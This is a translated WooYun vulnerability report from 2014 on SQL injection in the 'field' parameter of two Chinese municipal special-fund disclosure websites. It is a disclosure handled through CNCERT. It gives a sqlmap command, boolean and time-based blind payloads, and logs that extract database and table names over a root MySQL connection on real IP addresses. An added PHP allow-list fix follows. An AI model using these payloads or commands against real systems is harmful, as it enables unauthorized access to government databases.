
Vulnerability summary

Defect ID: wooyun-2014-053936

Title: Two generic SQL injection vulnerabilities in a special-fund disclosure platform

Vendor: Langfang Municipal People's Government

Author: Mr.leo

Submitted: 2014-03-18 13:18

Fix deadline: 2014-05-02 13:18

Disclosed: 2014-05-02 13:18

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-03-18: details sent to the vendor, awaiting vendor handling
2014-03-25: vendor has confirmed; details disclosed to the vendor only
2014-04-04: details disclosed to core white hats and relevant domain experts
2014-04-14: details disclosed to regular white hats
2014-04-24: details disclosed to intern white hats
2014-05-02: details disclosed to the public

Brief description:

Two generic SQL injection vulnerabilities in a special-fund disclosure platform

Detailed description:

http://60.10.25.13/www/ Langfang Special Fund Disclosure Website



Vulnerable parameter: field
http://60.10.25.13/www/item_seach.php?field=plan_money&keywords=&order=desc&style=&town=&unit_id=&village=

The application connects as the root user:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: field
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: field=plan_money AND 1253=1253&keywords=&order=desc&style=&town=&unit_id=&village=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: field=plan_money AND SLEEP(5)&keywords=&order=desc&style=&town=&unit_id=&village=
---
[17:18:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL 5.0.11
[17:18:02] [INFO] fetching current user
[17:18:02] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:18:02] [INFO] retrieved:
[17:18:12] [WARNING] reflective value(s) found and filtering out
root@%
current user: 'root@%'
[17:25:42] [INFO] fetching current database
[17:25:42] [INFO] retrieved: langfang
current database: 'langfang'
[17:35:33] [INFO] fetching database names
[17:35:33] [INFO] fetching number of databases
[17:35:33] [INFO] retrieved: 8
[17:36:38] [INFO] retrieved: information_schema
[17:57:08] [INFO] retrieved: gaogang
[18:05:45] [INFO] retrieved: langfang
[18:15:25] [INFO] retrieved: langfang_bake
[18:30:29] [INFO] retrieved: langfang_peixun
[18:47:43] [INFO] retrieved: mysql
[18:54:11] [INFO] retrieved: test
[18:59:34] [INFO] retrieved: zuzhijigou-tmp
available databases [8]:
[*] `zuzhijigou-tmp`
[*] gaogang
[*] information_schema
[*] langfang
[*] langfang_bake
[*] langfang_peixun
[*] mysql
[*] test

218 tables; partial data shown:

[09:11:44] [INFO] fetching tables for database: 'langfang'
[09:11:44] [INFO] fetching number of tables for database 'langfang'
[09:11:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:11:44] [INFO] retrieved: 218
[09:13:54] [INFO] retrieved: admin
[09:20:22] [INFO] retrieved: admin_identify
[09:31:58] [INFO] retrieved: admin_login_info
[09:44:54] [INFO] retrieved: admin_order_set
[09:56:50] [INFO] retrieved: admin_persona_func
[10:11:55] [INFO] retrieved: admin_right
[10:19:29] [INFO] retrieved: admin_unit_right
[10:32:28] [INFO] retrieved: book_temp
[10:43:25] [INFO] retrieved: city
[10:48:58] [INFO] retrieved: city_copy
[10:56:05] [INFO] retrieved: counter
[11:03:56] [INFO] retrieved: cp_info
[11:11:48] [INFO] retrieved: cp_re
[11:15:41] [INFO] retrieved: cp_reply
[11:20:46] [INFO] retrieved: cp_reply_appraise
[11:32:49] [INFO] retrieved: cp_to
[11:36:41] [INFO] retrieved: cp_to_log
[11:42:50] [INFO] retrieved: cp_unit
[11:48:51] [INFO] retrieved: department
[12:00:51] [INFO] retrieved: flink
[12:07:28] [INFO] retrieved: flink_type
[12:14:41] [INFO] retrieved: funds_acc
[12:24:41] [INFO] retrieved: funds_acc_item
[12:32:32] [INFO] retrieved: funds_account
[12:39:28] [INFO] retrieved: funds_class
[12:47:01] [INFO] retrieved: funds_class_unit
[12:55:11] [INFO] retrieved: funds_class_year
[13:02:36] [INFO] retrieved: funds_coa
[13:07:05] [INFO] retrieved: funds_coa_acc
[13:13:53] [INFO] retrieved: funds_detail
[13:22:31] [INFO] retrieved: funds_detail_in
[13:28:41] [INFO] retrieved: funds_detail_in_log
[13:36:24] [INFO] retrieved: funds_detail_out
[13:42:53] [INFO] retrieved: funds_detail_out_excel
[13:52:55] [INFO] retrieved: funds_detail_out_fujian
[14:03:15] [INFO] retrieved: funds_detail_res
[14:09:44] [INFO] retrieved: funds_detail_send
[14:17:19] [INFO] retrieved: funds_detail_send_log
[14:25:25] [INFO] retrieved: funds_detail_tmp
[14:31:58] [INFO] retrieved: funds_detail_total
[14:39:43] [INFO] retrieved: funds_edu_del
[14:49:26] [INFO] retrieved: funds_edu_head
[14:56:33] [INFO] retrieved: funds_edu_res
[15:02:33] [INFO] retrieved: funds_fujian
[15:11:12] [INFO] retrieved: funds_fujian_lis

http://218.25.228.157/www/ Benxi Special Fund Disclosure Website



The parameter is the same, field:
[root@Hacker~]# Sqlmap -u "http://218.25.228.157/www/item_seach.php?field=plan_money&keywords=&order=desc&style=&town=&unit_id=&village=" --dbs --current-user --current-db


Again the root user:
Place: GET
Parameter: field
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: field=plan_money AND 3510=3510&keywords=&order=desc&style=&town=&unit_id=&village=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: field=plan_money AND SLEEP(5)&keywords=&order=desc&style=&town=&unit_id=&village=
---
[20:19:50] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL 5.0.11
[20:19:50] [INFO] fetching current user
[20:19:50] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:19:50] [INFO] retrieved:
[20:20:00] [WARNING] reflective value(s) found and filtering out
root@%
current user: 'root@%'
[20:27:53] [INFO] fetching current database
[20:27:53] [INFO] retrieved: benxi
current database: 'benxi'
[20:34:43] [INFO] fetching database names
[20:34:43] [INFO] fetching number of databases
[20:34:43] [INFO] retrieved: 4
[20:35:42] [INFO] retrieved: information_schema
[20:57:25] [INFO] retrieved: benxi
[21:04:17] [INFO] retrieved: mysql
[21:11:08] [INFO] retrieved: test
available databases [4]:
[*] benxi
[*] information_schema
[*] mysql
[*] test

215 tables, retrieved via time-based injection; the partial data below is enough to show the problem:
[08:52:46] [INFO] fetching tables for database: 'benxi'
[08:52:46] [INFO] fetching number of tables for database 'benxi'
[08:52:46] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:52:46] [INFO] retrieved: 215
[08:55:05] [INFO] retrieved: admin
[09:01:58] [INFO] retrieved: admin_identify
[09:14:23] [INFO] retrieved: admin_login_info

Proof of vulnerability:

Already demonstrated above.

Fix recommendation:

Filter the parameter.
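As an added example (not code from the report or from the platform's vendor), the PHP below shows the vulnerable pattern the sqlmap output implies next to a hardened version of the same query builder. It assumes item_seach.php uses the GET parameter field as the ORDER BY column, order as the sort direction and keywords as a search term; the real source is not shown, and every table and column name other than plan_money is a placeholder. A column name cannot be bound as a prepared-statement parameter, so "filtering the parameter" here means checking it against an allow-list of column names, not escaping it. The code targets PHP 7.1 or later; the pattern is the same on the PHP 5.2 the sites run.

```php
<?php
// Added example, not the platform's own code. Assumes item_seach.php builds an
// ORDER BY clause from $_GET['field'] and $_GET['order'] and a LIKE filter from
// $_GET['keywords']. Table "item" and column "name" are placeholders.

// Vulnerable pattern: the column name is dropped straight into the SQL text,
// so field=plan_money AND SLEEP(5) becomes part of the executed statement.
function build_query_vulnerable(array $get): string
{
    $field    = $get['field'] ?? 'plan_money';
    $order    = $get['order'] ?? 'desc';
    $keywords = $get['keywords'] ?? '';
    return "SELECT * FROM item WHERE name LIKE '%$keywords%' ORDER BY $field $order";
}

// Hardened pattern: identifiers (column, direction) cannot be bound as
// parameters, so they are checked against an allow-list and the SQL text is
// assembled only from allow-listed constants; the search term is bound.
const SORTABLE_COLUMNS = ['plan_money', 'unit_id', 'village', 'town']; // placeholder list
const SORT_DIRECTIONS  = ['asc' => 'ASC', 'desc' => 'DESC'];

function build_query_safe(array $get): array
{
    $field = $get['field'] ?? 'plan_money';
    if (!in_array($field, SORTABLE_COLUMNS, true)) {
        // Reject rather than "clean": anything not on the list is not a column.
        throw new InvalidArgumentException('unsupported sort column');
    }
    $order = strtolower($get['order'] ?? 'desc');
    if (!isset(SORT_DIRECTIONS[$order])) {
        throw new InvalidArgumentException('unsupported sort direction');
    }
    $sql    = "SELECT * FROM item WHERE name LIKE ? ORDER BY `$field` " . SORT_DIRECTIONS[$order];
    $params = ['%' . ($get['keywords'] ?? '') . '%'];
    return [$sql, $params];
}

// Executes the hardened query through PDO with the search term bound.
function run_search(PDO $db, array $get): array
{
    [$sql, $params] = build_query_safe($get);
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demonstration with the payload shape from the report (no database needed).
$probe = ['field' => 'plan_money AND SLEEP(5)', 'keywords' => '', 'order' => 'desc'];
echo build_query_vulnerable($probe), "\n";   // SLEEP(5) lands inside the SQL text
try {
    build_query_safe($probe);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n"; // the allow-list refuses the value
}
```

The allow-list closes the injection point itself; it does not change the second finding in the report, that the application connects as root@%. A separate fix is to give the web application its own MySQL account restricted to the database it serves, so that a future injection cannot reach the other databases listed in the sqlmap output.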

Copyright notice: please credit Mr.leo@WooYun when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 14

Confirmed: 2014-03-25 23:12

Vendor reply:

This has been forwarded through CNCERT to the Hebei and Liaoning branch centers respectively for handling. The software vendor has not yet been contacted directly; the website's operating unit has been advised to require the vendor to provide a fix.

Latest status:

None yet